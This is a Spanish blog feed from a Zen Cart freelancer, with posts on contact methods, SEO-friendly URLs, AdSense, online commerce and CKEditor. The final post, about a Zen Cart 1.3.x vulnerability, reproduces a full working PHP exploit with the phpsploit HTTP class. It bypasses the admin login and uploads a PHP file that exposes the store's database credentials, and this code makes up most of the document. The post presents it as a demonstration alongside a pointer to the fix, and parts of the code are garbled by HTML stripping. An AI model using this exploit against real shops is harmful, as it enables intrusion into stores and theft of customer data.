Experto Zen Cart - Programador Freelance Tiendas Virtuales Zen Cart

Ampliar los métodos de contacto con Messenger en la web

Sergio Guerrero — Tue, 12 Jan 2010 23:00:11 +0000

Una buena página de contacto debería orientar a los usuarios tanto en los métodos a emplear (teléfono, fax, e-mail, chat…), como en los motivos por los que contactar (dudas sobre un producto, información sobre un pedido, consejos…).

Los métodos que comúnmente encontramos son: el teléfono, el e-mail, los formularios de contacto y el fax, pero suele ser buena idea el ofrecer otras alternativas, como por ejemplo, las redes sociales en las que se tenga presencia y la mensajería instantánea como: skype, GTalk y, porque no, Messenger en la web (mediante Windows Live™ Messenger IM Control o mediante Plugoo).

Comparte esta entrada:

URLs amigables en Zen Cart

Sergio Guerrero — Sun, 22 Nov 2009 09:13:19 +0000

El empleo de palabras relevantes en las URL influye positivamente a la hora de mejorar la posición de nuestra tienda virtual en los buscadores. Utilizando una URL semántica o URL amigable estamos aportando nuestro granito de arena en la relevancia web y, al mismo tiempo, estamos consiguiendo direcciones entendibles para nuestros usuarios.

Por defecto, las URL que tendremos en nuestra tienda Zen Cart no son nada amigables. Estas URLs contendrán los parámetros necesarios para identificar, en cada momento, el tipo de acción que deseamos realizar o el contenido que queremos consultar.

Veamos, por ejemplo, la dirección de un producto:

http://www.zen-cart.es/index.php?main_page=product_info&products_id=460&zenid=ob3kgp65qns3uft0fqc9c8vhk2

Esta dirección tiene los parámetros necesarios para acceder a la información de un producto concreto:

main_page: página a la que queremos acceder (product_info; página de información del producto).
products_id: identificador único del producto que deseamos consultar. En este caso, deseamos consultar el producto 460.
zen_id: este parámetro sólo lo encontraremos la primera vez que accedamos a la tienda y se utiliza para identificar de forma única a cada uno de los usuarios durante toda su navegación por nuestra tienda.

El identificador de sesión (zen_id) supone una desventaja adicional a la hora de posicionar nuestra tienda y, concretamente a la hora de evitar el contenido duplicado. Este parámetro de sesión irá variando por cada usuario que acceda a nuestra tienda y de la misma forma, varirá cuando el buscador/robot de turno intente indexar nuestro contenido. Con esto, estaremos mostrando exactamente el mismo contenido para diferentes direcciones URL.

Configurando correctamente nuestra tienda, podemos conseguir ignorar el parámetro de sesión en los buscadores, aunque este siga apareciendo en nuestras direcciones. Algunos buscadores, como por ejemplo Google, también nos ofrecen la posibilidad de ignorar estos parámetros mediante algunos ajustes en sus Herramientas para Webmasters.

Ventajas de las URL amigables

Como hemos mencionado al inicio de esta entrada, una URL semántica o URL amigable tiene diversas ventajas frente a las URL parametrizadas, pero cuales son estas ventajas?

Las URLs amigables son más fáciles de memorizar y por lo general, son más cortas que las URLs parametrizadas
- http://www.zen-cart.es/index.php?main_page=product_info&products_id=460&zenid=ob3kgp65qns3uft0fqc9c8vhk2
- http://www.zen-cart.es/posicionamiento-web/urls-amigables
Nos ofrecen la posibilidad de situar mejor al usuario mediante el uso de niveles y subniveles
- http://www.zen-cart.es/posicionamiento-web/urls-amigables
- http://www.zen-cart.es/posicionamiento-web/relevancia-web/el-contenido
Mejoran la relevancia de cada página al incluir palabras clave en las direcciones
Nos aseguran la existencia de palabras relevantes a la hora de ser enlazados desde otras webs

URLs amigables en Zen Cart

Por defecto, Zen Cart no ofrece la posibilidad de tener direcciones URL amigables, pero existen extensiones/contribuciones que nos pueden ayudar a optimizar nuestra tienda en este sentido.

Ultimate SEO URLs

Esta contribución ha sido portada de Os Commerce y es la contribución más empleada a la hora de conseguir URLs amigables.

Pros:

Fácil de instalar
Fácil de activar y desactivar
Fácil de configurar
Fácil de gestionar las URL
Dispone de sistema de caché para productos, categorías, fabricantes,etc
Permite redirecciones 301 de URLs antiguas a URLs nuevas cuando realizamos cambios en las direcciones.

Contras:

No podemos decidir las URL de cada categoría, producto, fabricante/marca, etc
Las direcciones contienen algunos parámetros. No son direcciones totalmente limpias
No se actualiza desde 2008, mientras que su versión en Os Commerce ha seguido actualizándose con nuevas mejoras, correcciones de errores, etc

CEO Uri Mapping (SEO)

Pros:

Instalación fácil y limpia
Fácil de activar y desactivar
Fácil de configurar
Las URL son totalmente editables a nuestro gusto y limpias de parámetros. ¡Una gran ventaja!

Contras:

No dispone de un sistema automático para la generación de las URLs existentes, ni de gestión de URLs. Esto supone un gran problema en tiendas con muchos productos, en tiendas que importan su catálogo mediante excels, etc.
La extensión genera las URLs de categorías, productos, fabricantes/marcas, ez Pages, etc, pero una a una. Para generar una URL deberemos acceder a cada producto, categoría, fabricante, etc marcar la casilla de generación de URL o escribirla y guardar los datos. Para generar otras URLs deberemos acceder directamente a la base de datos.
El código actual, se torna exageradamente lento cuando tenemos muchas URLs generadas. Con más de 100.000 llega a tardar hasta 4 y 5 veces más que con la extensión desactivada, pero existe una solución a esta lentitud y la explicaremos en una de las próximas entradas.
No dispone de un sistema de caché
No permite redirecciones de URLs antiguas a URLs nuevas

Personalmente pienso que CEON URI Mapping presenta una gran ventaja frente a la contribución Ultimate SEO URLs, en el momento en el que podemos decidir cuales son las palabras que vamos a utilizar en una URL y cuales son los niveles y subniveles que deseamos mostrar. Frente a estas ventajas, nos vamos a encontrar problemas realmente importantes como el no disponer de un sistema de generación/gestión de URLs, pero si somos capaces de reutilizar el código de la contribución, podremos llegar a construirnos nuestras propias herramientas para solventar los contras de esta extensión.

Para los que quieran adentrarse en el tema de las URLs amigables, dejo un par de enlaces donde se ofrecen algunos consejos a la hora de crearlas:

Comparte esta entrada:

Google AdSense – Nueva interface

Sergio Guerrero — Sat, 07 Nov 2009 15:08:16 +0000

Google ha anunciado en la conferencia CRS (Content Revenue Strategies) las primeras pruebas que un grupo reducidos de usuarios está realizando sobre la versión beta de la nueva interface de Google AdSense.

Esta nueva interface ha sido construida en base a las peticiones de los usuarios y con el objetivo de satisfacer las demandas más importantes:

Ofrecer ideas para ayudarnos a tomar decisiones acerca de sus sitios

Google AdSense nos ofrecerá informes de rendimiento más detallados y estadísticas diarias en forma de gráfico, al estilo AdWords. Podremos consultar fácilmente el beneficio obtenido con varios anuncios publicitarios, dispondremos de nuevos indicadores: objetivos, tipos de oferta, etc y los ya existentes como: clics, impresiones, CTR, eCPM, etc.

Mayor control sobre los anuncios que aparecen en nuestra web

La nueva interface incorpora novedades en su Centro de Revisión de Anuncios que nos van a dar un mayor control sobre aquellos anuncios publicitarios que se mostraran en nuestra web.

Mejoras para administrar la cuenta de AdSense de forma más eficiente

Con el objetivo de hacer más sencillas las tareas comunes Google AdSense ha simplificado algunos procesos (realizar un cambio en dos anuncios al mismo tiempo ahora será más fácil), ha incorporado ayudas relevantes en todas sus páginas, consejos del equipo de AdSense para conseguir mejores resultados, etc.

Google está intentanto recabar información de los usuarios que puedan probar la interface en Inglés, español, francés, alemán, italiano y japonés. Para conseguir esta información están enviando invitaciones por correo para que hagamos de Betatesters de todas las novedades de AdSense.

Google se ha puesto las pilas durante la crisis

Comparte esta entrada:

Comercio electrónico 2.0

Sergio Guerrero — Tue, 08 Sep 2009 17:43:06 +0000

Leo en el blog de Fernando Maciá una entrada publicada en Mayo de este año, donde nos expone su visión sobre el cambio de modelo que está "empezando" a surgir en las aplicaciones para el comercio electrónico. Un cambio que los usuarios demandan día a día intentando encontrar entornos colaborativos, transparentes, con herramientas de calidad, útiles, funcionales y con buena usabilidad.

El modelo de tienda electrónica entendida como escaparate virtual o autoservicio online está claramente superado.

Fernando Maciá.

En España el comercio electrónico no está tan desarrollado como en otros países, pero actualmente continua evolucionando y creciendo a pesar de la crisis. Crisis que empuja a muchas empresas a optar por el modelo de venta on-line frente al modelo tradicional de venta en tienda física, bien por reducir costes, por intentar llegar a un público determinado o bien porque el tipo de negocio se puede desarrollar mejor de forma on-line (el ejemplo de reservas para casas rurales mencionado por Fernando puede ser una buena muestra).

Ahora la competencia es grande y los usuarios son más experimentados a la par que exigentes. Ya no es suficiente con que les mostremos nuestro catálogo, novedades, productos más vendidos o que por gentileza les guardemos la cesta por si deciden aplazar la compra para otro momento. ¡Hace falta algo más!

En mi opinión este cambio de modelo es un cambio que si se empieza a ver poco a poco, sobre todo en comercios relacionados con turismo, vuelos, hotes, etc, que empieza a ser demandado por los que deciden montar una tienda virtual y que está teniendo buenos resultados (como dice Fernando, supone una ventaja competitiva).

¿Podemos empezar a hablar de tiendas online 2.0 o comercios sociales?

Comparte esta entrada:

CKEditor 3.0 – La evolución de FCKEditor

Sergio Guerrero — Thu, 03 Sep 2009 22:11:59 +0000

A día de hoy disponemos de una amplia variedad de editores WYSIWYG y, entre todos los Open Source, destacaría dos:

FCKEditor (ahora CKEditor)
TinyMCE

Tanto FCKEditor como TinyMCE han sido adaptados para infinidad de plataformas como Zen Cart, Os Commerce, Prestashop, Joomla, Drupal, Wordpress, etc, etc. Ambos disponen de listas interminables de plugins (plugins FCKEditor, plugins TinyMCE) que los dota de mayores capacidades y, como no podía ser de otra forma, ambos proyectos están apoyados por grandes comunidades de usuarios y desarrolladores.

Aunque existen tantas posibilidades que sería complicado mencionarlos todos, quiero mencionar algunos ejemplos como los siguientes editores WYSIWYG:

CKEditor

CKEditor es la evolución que necesitaba este gran editor para continuar estando un paso por delante de su "competencia".

En esta nueva versión, el equipo de desarrollo ha realizado un gran esfuerzos en mejorar los puntos débiles del anterior FCKEditor como la velocidad de carga y, la complejidad y rendimiento de ciertas funcionalidades. Todo esto sin olvidar la filosofía de crear un editor accesible tanto en su interfaz de usuario como en el código HTML que genera, un editor compatible con los navegadores más utilizados, fácil de adaptar, estilizar y de extender mediante plugins, un editor WYSIWYG que no depende de ningún framework JS, con lo que se evitan posibles conflictos en aplicaciones que si incorporan alguno.

EL resultado

Con solo trastear mínimamente entre las diferentes herramientas que incorpora por defecto, se aprecia una notable mejoría respecto de las versiones anteriores, especialmente en la velocidad de carga del editor y de los diferentes elementos como las listas, ventanas o diálogos, etc (ya tengo ganas de incorporarlo en algún proyecto).

Se aprecian cambios importantes en el API JS del editor, pero de momento no puedo valorarlos con la con la corta experiencia que tengo con este nuevo API.

Lo que le falta

Sin demasiado tiempo para destriparlo por completo, sigo viendo aspectos mejorables en el apartado de la accesibilidad, en concreto cuando utilizamos la herramienta para pegar texto de Word y cuando intentamos indicar cambios de idioma en el texto.

La herramienta para pegar texto de Word, aunque consigue limpiar la basura de código que se genera al copiar de Word, no logra un código totalmente limpio ni XHTML 1.0 estricto. Por ejemplo, si pegamos un texto con negritas y cursivas, observaremos que utiliza el tag en vez de y el tag en vez de , cosa que no sucede al utilizar los botones por defecto del editor.

Si utilizamos el navegador Firefox para editar nuestros textos, quizá nos encontremos que se agregan, en el estilo, ciertos atributos específicos para dicho navegador (ej: -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;).

¿Qué os parece esta nueva versión?

Página oficial de CKEditor
Comparte esta entrada:

Zen Cart 1.3.x – Grave vulnerabilidad

Sergio Guerrero — Sat, 08 Aug 2009 21:37:52 +0000

En milw0rm.com se publican dos scripts (inyección de código, inyección de SQL) para explotar una grave vulnerabilidad que afecta a toda la rama 1.3.x de Zen Cart y que permite inyectar código de forma remota en el directorio de imágenes. Una vez nos inyectan el código en nuestra web, pueden incluso obtener los datos de acceso a la base de datos y borrarla o consultar los datos de nuestros clientes.

En vez de utilizar el exploit original, mostraré una modificación para mostrar los desastrosos efectos que puede tener esta vulnerabilidad de Zen Cart.

En el siguiente ejemplo muestro como nos podrían inyectar código de forma remota permitiéndoles obtener los datos de acceso a la base de datos. Antes de ejecutarlo, es necesario indicar correctamente la URL modificando la variable $url y si la tienda es vulnerable les aparecerá un enlace hacia el documento PHP que muestra los datos de acceso a la base de datos.

| ======================================================================== | | | \$system> php $argv[0] <url> | | Notes: <url> ex: http://victim.com/site (no slash) | | | ======================================================================== ";exit(1); }*/ $url = 'http://www.web_con_bug.com'; $trick = "/password_forgotten.php"; $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); $real_kthxbye = remote_exec($url); // Remote Code Execution Exploit function remote_exec($url) { global $xpl, $url, $trick; echo "\n[-] Ejecució remota de código"; if(!$xpl->get($url.'/admin/')) { die("\n[!] error - El directorio /admin/ es un directorio protegido o no existe.\n"); } $n = substr(md5(rand(0, 1337)), 0, 5).".php"; // random php file $code = 'DB_SERVER: " . DB_SERVER; echo "DB_SERVER_USERNAME: " . DB_SERVER_USERNAME; echo "DB_SERVER_PASSWORD: " . DB_SERVER_PASSWORD; echo "DB_DATABASE: " . DB_DATABASE;?>'; $form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert", "record_company_name" => "0", "record_company_image" => array(frmdt_type => "tgreal/suce", // it works ! o_O frmdt_filename => $n, frmdt_content => $code)); if($xpl->formdata($form)) { echo "\n[!] Código inyectado en "{$url}/images/{$n}\"">{$url}/images/{$n}a>"; } else { die("\n[!] error - No ha sido posible subir el script\n"); } } /** * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 4 / PHP 5 * VERSION: 2.0 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * * [2007-06-10] (2.0) * * Code: Code optimization * * New: Compatible with PHP 4 by default * * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { var $proxyhost; var $proxyport; var $host; var $path; var $port; var $method; var $url; var $packet; var $proxyuser; var $proxypass; var $header; var $cookie; var $data; var $boundary; var $allowredirection; var $last_redirection; var $cookiejar; var $recv; var $cookie_str; var $header_str; var $server_content; var $server_header; /** * This function is called by the * get()/post()/formdata() functions. * You don't have to call it, this is * the main function. * * @access private * @return string $this->recv ServerResponse * */ function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = @fsockopen($this->proxyhost,$this->proxyport); else $socket = @fsockopen($this->host,$this->port); if(!$socket) die("Error: Host seems down"); if($this->method=='get') $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; elseif($this->method=='post' or $this->method=='formdata') $this->packet = 'POST '.$this->url." HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; if(!empty($this->header)) $this->packet .= $this->showheader(); if(!empty($this->cookie)) $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; $this->packet .= 'Host: '.$this->host."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method=='post') { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method=='formdata') { $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->getcookie(); if($this->allowredirection) return $this->getredirection(); else return $this->recv; } /** * This function allows you to add several * cookies in the request. * * @access public * @param string cookn CookieName * @param string cookv CookieValue * @example $this->addcookie('name','value') * */ function addcookie($cookn,$cookv) { if(!isset($this->cookie)) $this->cookie = array(); $this->cookie[$cookn] = $cookv; } /** * This function allows you to add several * headers in the request. * * @access public * @param string headern HeaderName * @param string headervalue Headervalue * @example $this->addheader('Client-IP', '128.5.2.3') * */ function addheader($headern,$headervalue) { if(!isset($this->header)) $this->header = array(); $this->header[$headern] = $headervalue; } /** * This function allows you to use an * http proxy server. Several methods * are supported. * * @access public * @param string proxy ProxyHost * @param integer proxyp ProxyPort * @example $this->proxy('localhost',8118) * @example $this->proxy('localhost:8118') * */ function proxy($proxy,$proxyp='') { if(empty($proxyp)) { $proxarr = explode(':',$proxy); $this->proxyhost = $proxarr[0]; $this->proxyport = (int)$proxarr[1]; } else { $this->proxyhost = $proxy; $this->proxyport = (int)$proxyp; } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an * http proxy server which requires a * basic authentification. Several * methods are supported: * * @access public * @param string proxyauth ProxyUser * @param string proxypass ProxyPass * @example $this->proxyauth('user','pwd') * @example $this->proxyauth('user:pwd'); * */ function proxyauth($proxyauth,$proxypass='') { if(empty($proxypass)) { $posvirg = strpos($proxyauth,':'); $this->proxyuser = substr($proxyauth,0,$posvirg); $this->proxypass = substr($proxyauth,$posvirg+1); } else { $this->proxyuser = $proxyauth; $this->proxypass = $proxypass; } } /** * This function allows you to set * the 'User-Agent' header. * * @access public * @param string useragent Agent * @example $this->agent('Firefox') * */ function agent($useragent) { $this->addheader('User-Agent',$useragent); } /** * This function returns the headers * which will be in the next request. * * @access public * @return string $this->header_str Headers * @example $this->showheader() * */ function showheader() { $this->header_str = ''; if(!isset($this->header)) return; foreach($this->header as $name => $value) $this->header_str .= $name.': '.$value."\r\n"; return $this->header_str; } /** * This function returns the cookies * which will be in the next request. * * @access public * @return string $this->cookie_str Cookies * @example $this->showcookie() * */ function showcookie() { $this->cookie_str = ''; if(!isset($this->cookie)) return; foreach($this->cookie as $name => $value) $this->cookie_str .= $name.'='.$value.'; '; return $this->cookie_str; } /** * This function returns the last * formed http request. * * @access public * @return string $this->packet HttpPacket * @example $this->showlastrequest() * */ function showlastrequest() { if(!isset($this->packet)) return; else return $this->packet; } /** * This function sends the formed * http packet with the GET method. * * @access public * @param string url Url * @return string $this->sock() * @example $this->get('localhost/index.php?var=x') * @example $this->get('http://localhost:88/tst.php') * */ function get($url) { $this->target($url); $this->method = 'get'; return $this->sock(); } /** * This function sends the formed * http packet with the POST method. * * @access public * @param string url Url * @param string data PostData * @return string $this->sock() * @example $this->post('http://localhost/','helo=x') * */ function post($url,$data) { $this->target($url); $this->method = 'post'; $this->data = $data; return $this->sock(); } /** * This function sends the formed http * packet with the POST method using * the multipart/form-data enctype. * * @access public * @param array array FormDataArray * @return string $this->sock() * @example $formdata = array( * frmdt_url => 'http://localhost/upload.php', * frmdt_boundary => '123456', # Optional * 'var' => 'example', * 'file' => array( * frmdt_type => 'image/gif', # Optional * frmdt_transfert => 'binary' # Optional * frmdt_filename => 'hello.php, * frmdt_content => '')); * $this->formdata($formdata); * */ function formdata($array) { $this->target($array[frmdt_url]); $this->method = 'formdata'; $this->data = ''; if(!isset($array[frmdt_boundary])) $this->boundary = 'phpsploit'; else $this->boundary = $array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match('#^frmdt_(boundary|url)#',$key)) { $this->data .= str_repeat('-',29).$this->boundary."\r\n"; $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content * of the server response, without * the headers. * * @access public * @param string code ServerResponse * @return string $this->server_content * @example $this->getcontent() * @example $this->getcontent($this->get('http://localhost/')) * */ function getcontent($code='') { if(empty($code)) $code = $this->recv; $code = explode("\r\n\r\n",$code); $this->server_content = ''; for($i=1;$i<count($code);$i++) this-="">server_content .= $code[$i]; return $this->server_content; } /** * This function returns the headers * of the server response, without * the content. * * @access public * @param string code ServerResponse * @return string $this->server_header * @example $this->getcontent() * @example $this->getcontent($this->post('http://localhost/','1=2')) * */ function getheader($code='') { if(empty($code)) $code = $this->recv; $code = explode("\r\n\r\n",$code); $this->server_header = $code[0]; return $this->server_header; } /** * This function is called by the * cookiejar() function. It adds the * value of the "Set-Cookie" header * in the "Cookie" header for the * next request. You don't have to * call it. * * @access private * @param string code ServerResponse * */ function getcookie() { foreach(explode("\r\n",$this->getheader()) as $header) { if(preg_match('/set-cookie/i',$header)) { $fequal = strpos($header,'='); $fvirgu = strpos($header,';'); // 12=strlen('set-cookie: ') $cname = substr($header,12,$fequal-12); $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); $this->cookie[trim($cname)] = trim($cvalu); } } } /** * This function is called by the * get()/post() functions. You * don't have to call it. * * @access private * @param string urltarg Url * @example $this->target('http://localhost/') * */ function target($urltarg) { if(!ereg('^http://',$urltarg)) $urltarg = 'http://'.$urltarg; $urlarr = parse_url($urltarg); $this->url = 'http://'.$urlarr['host'].$urlarr['path']; if(isset($urlarr['query'])) $this->url .= '?'.$urlarr['query']; $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; $this->host = $urlarr['host']; if($this->port != '80') $this->host .= ':'.$this->port; if(!isset($urlarr['path']) or empty($urlarr['path'])) die("Error: No path precised"); $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, * the script will extract all * 'Set-Cookie' headers values * and it will automatically add * them into the 'Cookie' header * for all next requests. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->cookiejar(0) * @example $this->cookiejar(1) * */ function cookiejar($code) { if($code=='0') $this->cookiejar=FALSE; elseif($code=='1') $this->cookiejar=TRUE; } /** * If you call this function, * the script will follow all * redirections sent by the server. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->allowredirection(0) * @example $this->allowredirection(1) * */ function allowredirection($code) { if($code=='0') $this->allowredirection=FALSE; elseif($code=='1') $this->allowredirection=TRUE; } /** * This function is called if * allowredirection() is enabled. * You don't have to call it. * * @access private * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) * @return string $this->get($this->last_redirection) * @return string $this->recv; * */ function getredirection() { if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) { $this->last_redirection = trim($codearr[2]); if(!ereg('://',$this->last_redirection)) return $this->get('http://'.$this->host.$this->path.$this->last_redirection); else return $this->get($this->last_redirection); } else return $this->recv; } /** * This function allows you * to reset some parameters. * * @access public * @param string func Param * @example $this->reset('header') * @example $this->reset('cookie') * @example $this->reset() * */ function reset($func='') { switch($func) { case 'header': $this->header = array(''); break; case 'cookie': $this->cookie = array(''); break; default: $this->cookiejar = ''; $this->header = array(''); $this->cookie = array(''); $this->allowredirection = ''; break; } } } count($code);$i++)>url>url>

Este script no funciona en caso de no encontrar el directorio admin y es por eso que podemos aplicar la solución que se comenta en el foro de Zen Cart.
Comparte esta entrada: